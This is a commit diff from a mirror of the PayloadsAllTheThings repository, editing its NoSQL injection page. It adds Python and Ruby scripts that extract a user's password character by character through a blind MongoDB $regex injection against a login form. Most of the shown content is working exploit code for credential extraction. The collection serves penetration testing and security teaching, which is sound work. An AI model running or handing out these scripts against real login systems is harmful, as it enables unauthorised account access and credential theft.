mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
commit
7a528ccb3f
@ -11,6 +11,7 @@
|
|||||||
* [Extract data information](#extract-data-information)
|
* [Extract data information](#extract-data-information)
|
||||||
* [Blind NoSQL](#blind-nosql)
|
* [Blind NoSQL](#blind-nosql)
|
||||||
* [POST with JSON body](#post-with-json-body)
|
* [POST with JSON body](#post-with-json-body)
|
||||||
|
* [POST with urlencoded body](#post-with-urlencoded-body)
|
||||||
* [GET](#get)
|
* [GET](#get)
|
||||||
* [MongoDB Payloads](#mongodb-payloads)
|
* [MongoDB Payloads](#mongodb-payloads)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
@ -84,6 +85,7 @@ Extract data with "in"
|
|||||||
|
|
||||||
### POST with JSON body
|
### POST with JSON body
|
||||||
|
|
||||||
|
python script:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
import requests
|
import requests
|
||||||
@ -109,6 +111,8 @@ while True:
|
|||||||
|
|
||||||
### POST with urlencoded body
|
### POST with urlencoded body
|
||||||
|
|
||||||
|
python script:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
import requests
|
import requests
|
||||||
import urllib3
|
import urllib3
|
||||||
@ -133,6 +137,8 @@ while True:
|
|||||||
|
|
||||||
### GET
|
### GET
|
||||||
|
|
||||||
|
python script:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
import requests
|
import requests
|
||||||
import urllib3
|
import urllib3
|
||||||
@ -147,13 +153,40 @@ u='http://example.org/login'
|
|||||||
while True:
|
while True:
|
||||||
for c in string.printable:
|
for c in string.printable:
|
||||||
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||||
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
payload=f"?username={username}&password[$regex]=^{password + c}"
|
||||||
r = requests.get(u + payload)
|
r = requests.get(u + payload)
|
||||||
if 'Yeah' in r.text:
|
if 'Yeah' in r.text:
|
||||||
print("Found one more char : %s" % (password+c))
|
print(f"Found one more char : {password+c}")
|
||||||
password += c
|
password += c
|
||||||
```
|
```
|
||||||
|
|
||||||
|
ruby script:
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
require 'httpx'
|
||||||
|
|
||||||
|
username = 'admin'
|
||||||
|
password = ''
|
||||||
|
url = 'http://example.org/login'
|
||||||
|
# CHARSET = (?!..?~).to_a # all ASCII printable characters
|
||||||
|
CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
|
||||||
|
GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
|
||||||
|
session = HTTPX.plugin(:persistent)
|
||||||
|
|
||||||
|
while true
|
||||||
|
CHARSET.each do |c|
|
||||||
|
unless GET_EXCLUDE.include?(c)
|
||||||
|
payload = "?username=#{username}&password[$regex]=^#{password + c}"
|
||||||
|
res = session.get(url + payload)
|
||||||
|
if res.body.to_s.match?('Yeah')
|
||||||
|
puts "Found one more char : #{password + c}"
|
||||||
|
password += c
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
```
|
||||||
|
|
||||||
## MongoDB Payloads
|
## MongoDB Payloads
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
Loading…
Reference in New Issue
Block a user